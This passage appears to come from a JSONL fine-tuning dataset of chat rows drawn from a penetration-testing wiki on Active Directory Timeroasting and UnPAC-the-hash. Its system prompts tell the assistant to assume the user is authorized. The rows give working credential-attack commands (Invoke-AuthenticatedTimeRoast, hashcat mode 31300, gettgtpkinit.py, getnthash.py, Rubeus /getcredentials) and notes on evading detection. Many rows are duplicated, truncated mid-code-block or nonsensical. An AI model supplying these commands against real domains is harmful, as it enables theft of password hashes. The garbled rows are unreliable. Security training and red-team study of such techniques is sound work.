Invoke-Kerberoast could be adapted to target computer accounts. However, the significant performance improvements and reduced detection profile make Timeroasting a valuable alternative in red team scenarios.\n\n::: tabs\n\n=== Windows\n\nThe Invoke-AuthenticatedTimeRoast (PowerShell) tool is designed for authenticated Timeroasting operations and automatically resolves RIDs to hostnames through Active Directory queries.\n\n```powershell"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Timeroasting - Authenticated Timeroasting", "response": "Performing Timeroasting with valid domain credentials offers distinct advantages, making it valuable beyond initial access scenarios:\n\n* Automatic RID-to-hostname mapping: When authenticated, RIDs can be automatically resolved to their corresponding computer account names through Active Directory queries, eliminating the need for manual correlation or SMB NULL session enumeration.\n* Improved cracking performance: SNTP hashes extracted via Timeroasting can be cracked approximately 10 times faster than traditional Kerberos TGS-REP (etype 23) hashes. While this does not make randomly generated machine passwords crackable, it significantly improves success rates when targeting weak passwords, particularly in environments with poor password hygiene or legacy provisioning processes.\n* Enhanced operational security: While Kerberoasting can be modified to target computer accounts by requesting Service Principal Names (SPNs) for all systems, this approach generates substantial network traffic and is more likely to be detected. Timeroasting produces less conspicuous network patterns and remains a relatively obscure technique, making it more suitable for stealth-focused red team operations.\n\n> [!NOTE]\n> Authenticated Timeroasting might appear redundant since tools like Rubeus or Invoke-Kerberoast could be adapted to target computer accounts. However, the significant performance improvements and reduced detection profile make Timeroasting a valuable alternative in red team scenarios.\n\n::: tabs\n\n=== Windows\n\nThe Invoke-AuthenticatedTimeRoast (PowerShell) tool is designed for authenticated Timeroasting operations and automatically resolves RIDs to hostnames through Active Directory queries.\n\n```powershell", "metadata": {"corpus_index": 755, "category": "credentials", "source_file": "docs/src/ad/movement/kerberos/timeroast.md", "page_title": "Timeroasting", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Timeroasting - Authenticated Timeroasting"}, {"role": "assistant", "content": "Performing Timeroasting with valid domain credentials offers distinct advantages, making it valuable beyond initial access scenarios:\n\n* Automatic RID-to-hostname mapping: When authenticated, RIDs can be automatically resolved to their corresponding computer account names through Active Directory queries, eliminating the need for manual correlation or SMB NULL session enumeration.\n* Improved cracking performance: SNTP hashes extracted via Timeroasting can be cracked approximately 10 times faster than traditional Kerberos TGS-REP (etype 23) hashes. While this does not make randomly generated machine passwords crackable, it significantly improves success rates when targeting weak passwords, particularly in environments with poor password hygiene or legacy provisioning processes.\n* Enhanced operational security: While Kerberoasting can be modified to target computer accounts by requesting Service Principal Names (SPNs) for all systems, this approach generates substantial network traffic and is more likely to be detected. Timeroasting produces less conspicuous network patterns and remains a relatively obscure technique, making it more suitable for stealth-focused red team operations.\n\n> [!NOTE]\n> Authenticated Timeroasting might appear redundant since tools like Rubeus or Invoke-Kerberoast could be adapted to target computer accounts. However, the significant performance improvements and reduced detection profile make Timeroasting a valuable alternative in red team scenarios.\n\n::: tabs\n\n=== Windows\n\nThe Invoke-AuthenticatedTimeRoast (PowerShell) tool is designed for authenticated Timeroasting operations and automatically resolves RIDs to hostnames through Active Directory queries.\n\n```powershell"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Timeroasting - Authenticated Timeroasting", "response": "Performing Timeroasting with valid domain credentials offers distinct advantages, making it valuable beyond initial access scenarios:\n\n* Automatic RID-to-hostname mapping: When authenticated, RIDs can be automatically resolved to their corresponding computer account names through Active Directory queries, eliminating the need for manual correlation or SMB NULL session enumeration.\n* Improved cracking performance: SNTP hashes extracted via Timeroasting can be cracked approximately 10 times faster than traditional Kerberos TGS-REP (etype 23) hashes. While this does not make randomly generated machine passwords crackable, it significantly improves success rates when targeting weak passwords, particularly in environments with poor password hygiene or legacy provisioning processes.\n* Enhanced operational security: While Kerberoasting can be modified to target computer accounts by requesting Service Principal Names (SPNs) for all systems, this approach generates substantial network traffic and is more likely to be detected. Timeroasting produces less conspicuous network patterns and remains a relatively obscure technique, making it more suitable for stealth-focused red team operations.\n\n> [!NOTE]\n> Authenticated Timeroasting might appear redundant since tools like Rubeus or Invoke-Kerberoast could be adapted to target computer accounts. However, the significant performance improvements and reduced detection profile make Timeroasting a valuable alternative in red team scenarios.\n\n::: tabs\n\n=== Windows\n\nThe Invoke-AuthenticatedTimeRoast (PowerShell) tool is designed for authenticated Timeroasting operations and automatically resolves RIDs to hostnames through Active Directory queries.\n\n```powershell", "metadata": {"corpus_index": 755, "category": "credentials", "source_file": "docs/src/ad/movement/kerberos/timeroast.md", "page_title": "Timeroasting", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Default execution"}, {"role": "assistant", "content": "Invoke-AuthenticatedTimeRoast -DomainController $DC_IP"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Default execution", "response": "Invoke-AuthenticatedTimeRoast -DomainController $DC_IP", "metadata": {"corpus_index": 756, "category": "credentials", "source_file": "docs/src/ad/movement/kerberos/timeroast.md", "page_title": "Timeroasting", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Default execution?"}, {"role": "assistant", "content": "Invoke-AuthenticatedTimeRoast -DomainController $DC_IP"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Default execution?", "response": "Invoke-AuthenticatedTimeRoast -DomainController $DC_IP", "metadata": {"corpus_index": 756, "category": "credentials", "source_file": "docs/src/ad/movement/kerberos/timeroast.md", "page_title": "Timeroasting", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Generate wordlist based on computer names?"}, {"role": "assistant", "content": "Invoke-AuthenticatedTimeRoast -DomainController $DC_IP -GenerateWordlist\n```\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Generate wordlist based on computer names?", "response": "Invoke-AuthenticatedTimeRoast -DomainController $DC_IP -GenerateWordlist\n```\n\n:::", "metadata": {"corpus_index": 757, "category": "credentials", "source_file": "docs/src/ad/movement/kerberos/timeroast.md", "page_title": "Timeroasting", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Generate wordlist based on computer names"}, {"role": "assistant", "content": "Invoke-AuthenticatedTimeRoast -DomainController $DC_IP -GenerateWordlist\n```\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Generate wordlist based on computer names", "response": "Invoke-AuthenticatedTimeRoast -DomainController $DC_IP -GenerateWordlist\n```\n\n:::", "metadata": {"corpus_index": 757, "category": "credentials", "source_file": "docs/src/ad/movement/kerberos/timeroast.md", "page_title": "Timeroasting", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Timeroasting - Cracking SNTP hashes?"}, {"role": "assistant", "content": "SNTP hashes can be cracked using Hashcat mode 31300. This mode requires Hashcat v7.1.2 or later; earlier versions (such as v6.2.6) do not support this hash format.\n\nWhen the hash file contains RIDs as usernames (as output by tools like netexec or timeroast.py), the --username flag must be used to properly parse the hash format.\n\n``bash\nhashcat -m 31300 -a 0 -O hashes.txt $wordlist --username\n`\n\nAlternatively, the timecrack Python script can perform dictionary-based attacks, though it is slower than optimized Hashcat operations.\n\n`bash\ntimecrack.py extracted_hashes.txt $wordlist\n`\n\n> [!TIP]\n> When cracking SNTP hashes, supplement standard wordlists and rule sets with a custom wordlist containing all computer account names (lowercased, without the trailing $). This approach helps identify cases where computer passwords match their hostnames—a pattern frequently observed when accounts are created using the net computer` command or when the \"Assign this computer account as a pre-Windows 2000 Computer\" compatibility option is enabled in the Active Directory Users and Computers GUI.\n\n> [!TIP]\n> NTP traffic is common in AD environments, making Timeroasting difficult to detect. The attack generates minimal audit logs and is unlikely to trigger security alerts."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Timeroasting - Cracking SNTP hashes?", "response": "SNTP hashes can be cracked using Hashcat mode 31300. This mode requires Hashcat v7.1.2 or later; earlier versions (such as v6.2.6) do not support this hash format.\n\nWhen the hash file contains RIDs as usernames (as output by tools like netexec or timeroast.py), the --username flag must be used to properly parse the hash format.\n\n``bash\nhashcat -m 31300 -a 0 -O hashes.txt $wordlist --username\n`\n\nAlternatively, the timecrack Python script can perform dictionary-based attacks, though it is slower than optimized Hashcat operations.\n\n`bash\ntimecrack.py extracted_hashes.txt $wordlist\n`\n\n> [!TIP]\n> When cracking SNTP hashes, supplement standard wordlists and rule sets with a custom wordlist containing all computer account names (lowercased, without the trailing $). This approach helps identify cases where computer passwords match their hostnames—a pattern frequently observed when accounts are created using the net computer` command or when the \"Assign this computer account as a pre-Windows 2000 Computer\" compatibility option is enabled in the Active Directory Users and Computers GUI.\n\n> [!TIP]\n> NTP traffic is common in AD environments, making Timeroasting difficult to detect. The attack generates minimal audit logs and is unlikely to trigger security alerts.", "metadata": {"corpus_index": 758, "category": "credentials", "source_file": "docs/src/ad/movement/kerberos/timeroast.md", "page_title": "Timeroasting", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Timeroasting - Cracking SNTP hashes?"}, {"role": "assistant", "content": "SNTP hashes can be cracked using Hashcat mode 31300. This mode requires Hashcat v7.1.2 or later; earlier versions (such as v6.2.6) do not support this hash format.\n\nWhen the hash file contains RIDs as usernames (as output by tools like netexec or timeroast.py), the --username flag must be used to properly parse the hash format.\n\n``bash\nhashcat -m 31300 -a 0 -O hashes.txt $wordlist --username\n`\n\nAlternatively, the timecrack Python script can perform dictionary-based attacks, though it is slower than optimized Hashcat operations.\n\n`bash\ntimecrack.py extracted_hashes.txt $wordlist\n`\n\n> [!TIP]\n> When cracking SNTP hashes, supplement standard wordlists and rule sets with a custom wordlist containing all computer account names (lowercased, without the trailing $). This approach helps identify cases where computer passwords match their hostnames—a pattern frequently observed when accounts are created using the net computer` command or when the \"Assign this computer account as a pre-Windows 2000 Computer\" compatibility option is enabled in the Active Directory Users and Computers GUI.\n\n> [!TIP]\n> NTP traffic is common in AD environments, making Timeroasting difficult to detect. The attack generates minimal audit logs and is unlikely to trigger security alerts."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Timeroasting - Cracking SNTP hashes?", "response": "SNTP hashes can be cracked using Hashcat mode 31300. This mode requires Hashcat v7.1.2 or later; earlier versions (such as v6.2.6) do not support this hash format.\n\nWhen the hash file contains RIDs as usernames (as output by tools like netexec or timeroast.py), the --username flag must be used to properly parse the hash format.\n\n``bash\nhashcat -m 31300 -a 0 -O hashes.txt $wordlist --username\n`\n\nAlternatively, the timecrack Python script can perform dictionary-based attacks, though it is slower than optimized Hashcat operations.\n\n`bash\ntimecrack.py extracted_hashes.txt $wordlist\n`\n\n> [!TIP]\n> When cracking SNTP hashes, supplement standard wordlists and rule sets with a custom wordlist containing all computer account names (lowercased, without the trailing $). This approach helps identify cases where computer passwords match their hostnames—a pattern frequently observed when accounts are created using the net computer` command or when the \"Assign this computer account as a pre-Windows 2000 Computer\" compatibility option is enabled in the Active Directory Users and Computers GUI.\n\n> [!TIP]\n> NTP traffic is common in AD environments, making Timeroasting difficult to detect. The attack generates minimal audit logs and is unlikely to trigger security alerts.", "metadata": {"corpus_index": 758, "category": "credentials", "source_file": "docs/src/ad/movement/kerberos/timeroast.md", "page_title": "Timeroasting", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the hashcat syntax for timeroasting - cracking sntp hashes?"}, {"role": "assistant", "content": "hashcat -m 31300 -a 0 -O hashes.txt $wordlist --username"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the hashcat syntax for timeroasting - cracking sntp hashes?", "response": "hashcat -m 31300 -a 0 -O hashes.txt $wordlist --username", "metadata": {"corpus_index": 759, "category": "credentials", "source_file": "docs/src/ad/movement/kerberos/timeroast.md", "page_title": "Timeroasting", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "hashcat"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Timeroasting - Cracking SNTP hashes"}, {"role": "assistant", "content": "hashcat -m 31300 -a 0 -O hashes.txt $wordlist --username"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Timeroasting - Cracking SNTP hashes", "response": "hashcat -m 31300 -a 0 -O hashes.txt $wordlist --username", "metadata": {"corpus_index": 759, "category": "credentials", "source_file": "docs/src/ad/movement/kerberos/timeroast.md", "page_title": "Timeroasting", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `hashcat -m 31300 -a 0 -O hashes.txt $wordlist --username`?"}, {"role": "assistant", "content": "This command is used for timeroasting - cracking sntp hashes. Cracking SNTP hashes"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `hashcat -m 31300 -a 0 -O hashes.txt $wordlist --username`?", "response": "This command is used for timeroasting - cracking sntp hashes. Cracking SNTP hashes", "metadata": {"corpus_index": 759, "category": "credentials", "source_file": "docs/src/ad/movement/kerberos/timeroast.md", "page_title": "Timeroasting", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the timecrack.py command for timeroasting - cracking sntp hashes"}, {"role": "assistant", "content": "timecrack.py extracted_hashes.txt $wordlist"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the timecrack.py command for timeroasting - cracking sntp hashes", "response": "timecrack.py extracted_hashes.txt $wordlist", "metadata": {"corpus_index": 760, "category": "credentials", "source_file": "docs/src/ad/movement/kerberos/timeroast.md", "page_title": "Timeroasting", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "timecrack.py"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Timeroasting - Cracking SNTP hashes?"}, {"role": "assistant", "content": "timecrack.py extracted_hashes.txt $wordlist"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Timeroasting - Cracking SNTP hashes?", "response": "timecrack.py extracted_hashes.txt $wordlist", "metadata": {"corpus_index": 760, "category": "credentials", "source_file": "docs/src/ad/movement/kerberos/timeroast.md", "page_title": "Timeroasting", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `timecrack.py extracted_hashes.txt $wordlist`?"}, {"role": "assistant", "content": "This command is used for timeroasting - cracking sntp hashes. Cracking SNTP hashes"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `timecrack.py extracted_hashes.txt $wordlist`?", "response": "This command is used for timeroasting - cracking sntp hashes. Cracking SNTP hashes", "metadata": {"corpus_index": 760, "category": "credentials", "source_file": "docs/src/ad/movement/kerberos/timeroast.md", "page_title": "Timeroasting", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is UnPAC the hash - Theory?"}, {"role": "assistant", "content": "When using PKINIT to obtain a TGT (Ticket Granting Ticket), the KDC (Key Distribution Center) includes in the ticket a PAC_CREDENTIAL_INFO structure containing the NTLM keys (i.e. LM and NT hashes) of the authenticating user. This feature allows users to switch to NTLM authentications when remote servers don't support Kerberos, while still relying on an asymmetric Kerberos pre-authentication verification mechanism (i.e. PKINIT).\n\nThe NTLM keys will then be recoverable after a TGS-REQ through U2U, combined with S4U2self, which is a Service Ticket request made to the KDC where the user asks to authenticate to itself (i.e. S4U2self + User-to-User authentication).\n\nThe following protocol diagram details how UnPAC-the-hash works. It allows attackers that know a user's private key, or attackers able to conduct Shadow Credentials or Golden certificate attacks, to recover the user's LM and NT hashes.\n\n![](./assets/UnPAC-the-hash.png)\nUnPAC the hash flow{.caption}"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is UnPAC the hash - Theory?", "response": "When using PKINIT to obtain a TGT (Ticket Granting Ticket), the KDC (Key Distribution Center) includes in the ticket a PAC_CREDENTIAL_INFO structure containing the NTLM keys (i.e. LM and NT hashes) of the authenticating user. This feature allows users to switch to NTLM authentications when remote servers don't support Kerberos, while still relying on an asymmetric Kerberos pre-authentication verification mechanism (i.e. PKINIT).\n\nThe NTLM keys will then be recoverable after a TGS-REQ through U2U, combined with S4U2self, which is a Service Ticket request made to the KDC where the user asks to authenticate to itself (i.e. S4U2self + User-to-User authentication).\n\nThe following protocol diagram details how UnPAC-the-hash works. It allows attackers that know a user's private key, or attackers able to conduct Shadow Credentials or Golden certificate attacks, to recover the user's LM and NT hashes.\n\n![](./assets/UnPAC-the-hash.png)\nUnPAC the hash flow{.caption}", "metadata": {"corpus_index": 761, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/unpac-the-hash.md", "page_title": "UnPAC the hash", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for UnPAC the hash - Theory?"}, {"role": "assistant", "content": "When using PKINIT to obtain a TGT (Ticket Granting Ticket), the KDC (Key Distribution Center) includes in the ticket a PAC_CREDENTIAL_INFO structure containing the NTLM keys (i.e. LM and NT hashes) of the authenticating user. This feature allows users to switch to NTLM authentications when remote servers don't support Kerberos, while still relying on an asymmetric Kerberos pre-authentication verification mechanism (i.e. PKINIT).\n\nThe NTLM keys will then be recoverable after a TGS-REQ through U2U, combined with S4U2self, which is a Service Ticket request made to the KDC where the user asks to authenticate to itself (i.e. S4U2self + User-to-User authentication).\n\nThe following protocol diagram details how UnPAC-the-hash works. It allows attackers that know a user's private key, or attackers able to conduct Shadow Credentials or Golden certificate attacks, to recover the user's LM and NT hashes.\n\n![](./assets/UnPAC-the-hash.png)\nUnPAC the hash flow{.caption}"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for UnPAC the hash - Theory?", "response": "When using PKINIT to obtain a TGT (Ticket Granting Ticket), the KDC (Key Distribution Center) includes in the ticket a PAC_CREDENTIAL_INFO structure containing the NTLM keys (i.e. LM and NT hashes) of the authenticating user. This feature allows users to switch to NTLM authentications when remote servers don't support Kerberos, while still relying on an asymmetric Kerberos pre-authentication verification mechanism (i.e. PKINIT).\n\nThe NTLM keys will then be recoverable after a TGS-REQ through U2U, combined with S4U2self, which is a Service Ticket request made to the KDC where the user asks to authenticate to itself (i.e. S4U2self + User-to-User authentication).\n\nThe following protocol diagram details how UnPAC-the-hash works. It allows attackers that know a user's private key, or attackers able to conduct Shadow Credentials or Golden certificate attacks, to recover the user's LM and NT hashes.\n\n![](./assets/UnPAC-the-hash.png)\nUnPAC the hash flow{.caption}", "metadata": {"corpus_index": 761, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/unpac-the-hash.md", "page_title": "UnPAC the hash", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does UnPAC the hash - Practice work?"}, {"role": "assistant", "content": "::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, this attack can be conducted with PKINITtools (Python).\n\nThe first step consists in obtaining a TGT by validating a PKINIT pre-authentication first.\n\n``python\ngettgtpkinit.py -cert-pfx \"PATH_TO_CERTIFICATE\" -pfx-pass \"CERTIFICATE_PASSWORD\" \"FQDN_DOMAIN/TARGET_SAMNAME\" \"TGT_CCACHE_FILE\"\n`\n\nOnce the TGT is obtained, and the session key extracted (printed by gettgtpkinit.py), the getnthash.py script can be used to recover the NT hash.\n\n`bash\nexport KRB5CCNAME=\"TGT_CCACHE_FILE\"\ngetnthash.py -key 'AS-REP encryption key' 'FQDN_DOMAIN'/'TARGET_SAMNAME'\n`\n\nThe NT hash can be used for pass-the-hash, silver ticket, or Kerberos delegations abuse.\n\n=== Windows\n\nFrom Windows systems, Rubeus (C#) can be used to requesting a ticket using a certificate and use /getcredentials to retrieve the NT hash in the PAC.\n\n`powershell\nRubeus.exe asktgt /getcredentials /user:\"TARGET_SAMNAME\" /certificate:\"BASE64_CERTIFICATE\" /password:\"CERTIFICATE_PASSWORD\" /domain:\"FQDN_DOMAIN\" /dc:\"DOMAIN_CONTROLLER\" /show\n``\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does UnPAC the hash - Practice work?", "response": "::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, this attack can be conducted with PKINITtools (Python).\n\nThe first step consists in obtaining a TGT by validating a PKINIT pre-authentication first.\n\n``python\ngettgtpkinit.py -cert-pfx \"PATH_TO_CERTIFICATE\" -pfx-pass \"CERTIFICATE_PASSWORD\" \"FQDN_DOMAIN/TARGET_SAMNAME\" \"TGT_CCACHE_FILE\"\n`\n\nOnce the TGT is obtained, and the session key extracted (printed by gettgtpkinit.py), the getnthash.py script can be used to recover the NT hash.\n\n`bash\nexport KRB5CCNAME=\"TGT_CCACHE_FILE\"\ngetnthash.py -key 'AS-REP encryption key' 'FQDN_DOMAIN'/'TARGET_SAMNAME'\n`\n\nThe NT hash can be used for pass-the-hash, silver ticket, or Kerberos delegations abuse.\n\n=== Windows\n\nFrom Windows systems, Rubeus (C#) can be used to requesting a ticket using a certificate and use /getcredentials to retrieve the NT hash in the PAC.\n\n`powershell\nRubeus.exe asktgt /getcredentials /user:\"TARGET_SAMNAME\" /certificate:\"BASE64_CERTIFICATE\" /password:\"CERTIFICATE_PASSWORD\" /domain:\"FQDN_DOMAIN\" /dc:\"DOMAIN_CONTROLLER\" /show\n``\n\n:::", "metadata": {"corpus_index": 762, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/unpac-the-hash.md", "page_title": "UnPAC the hash", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute UnPAC the hash - Practice?"}, {"role": "assistant", "content": "::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, this attack can be conducted with PKINITtools (Python).\n\nThe first step consists in obtaining a TGT by validating a PKINIT pre-authentication first.\n\n``python\ngettgtpkinit.py -cert-pfx \"PATH_TO_CERTIFICATE\" -pfx-pass \"CERTIFICATE_PASSWORD\" \"FQDN_DOMAIN/TARGET_SAMNAME\" \"TGT_CCACHE_FILE\"\n`\n\nOnce the TGT is obtained, and the session key extracted (printed by gettgtpkinit.py), the getnthash.py script can be used to recover the NT hash.\n\n`bash\nexport KRB5CCNAME=\"TGT_CCACHE_FILE\"\ngetnthash.py -key 'AS-REP encryption key' 'FQDN_DOMAIN'/'TARGET_SAMNAME'\n`\n\nThe NT hash can be used for pass-the-hash, silver ticket, or Kerberos delegations abuse.\n\n=== Windows\n\nFrom Windows systems, Rubeus (C#) can be used to requesting a ticket using a certificate and use /getcredentials to retrieve the NT hash in the PAC.\n\n`powershell\nRubeus.exe asktgt /getcredentials /user:\"TARGET_SAMNAME\" /certificate:\"BASE64_CERTIFICATE\" /password:\"CERTIFICATE_PASSWORD\" /domain:\"FQDN_DOMAIN\" /dc:\"DOMAIN_CONTROLLER\" /show\n``\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute UnPAC the hash - Practice?", "response": "::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, this attack can be conducted with PKINITtools (Python).\n\nThe first step consists in obtaining a TGT by validating a PKINIT pre-authentication first.\n\n``python\ngettgtpkinit.py -cert-pfx \"PATH_TO_CERTIFICATE\" -pfx-pass \"CERTIFICATE_PASSWORD\" \"FQDN_DOMAIN/TARGET_SAMNAME\" \"TGT_CCACHE_FILE\"\n`\n\nOnce the TGT is obtained, and the session key extracted (printed by gettgtpkinit.py), the getnthash.py script can be used to recover the NT hash.\n\n`bash\nexport KRB5CCNAME=\"TGT_CCACHE_FILE\"\ngetnthash.py -key 'AS-REP encryption key' 'FQDN_DOMAIN'/'TARGET_SAMNAME'\n`\n\nThe NT hash can be used for pass-the-hash, silver ticket, or Kerberos delegations abuse.\n\n=== Windows\n\nFrom Windows systems, Rubeus (C#) can be used to requesting a ticket using a certificate and use /getcredentials to retrieve the NT hash in the PAC.\n\n`powershell\nRubeus.exe asktgt /getcredentials /user:\"TARGET_SAMNAME\" /certificate:\"BASE64_CERTIFICATE\" /password:\"CERTIFICATE_PASSWORD\" /domain:\"FQDN_DOMAIN\" /dc:\"DOMAIN_CONTROLLER\" /show\n``\n\n:::", "metadata": {"corpus_index": 762, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/unpac-the-hash.md", "page_title": "UnPAC the hash", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the gettgtpkinit.py command for unpac the hash - practice"}, {"role": "assistant", "content": "gettgtpkinit.py -cert-pfx \"PATH_TO_CERTIFICATE\" -pfx-pass \"CERTIFICATE_PASSWORD\" \"FQDN_DOMAIN/TARGET_SAMNAME\" \"TGT_CCACHE_FILE\""}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the gettgtpkinit.py command for unpac the hash - practice", "response": "gettgtpkinit.py -cert-pfx \"PATH_TO_CERTIFICATE\" -pfx-pass 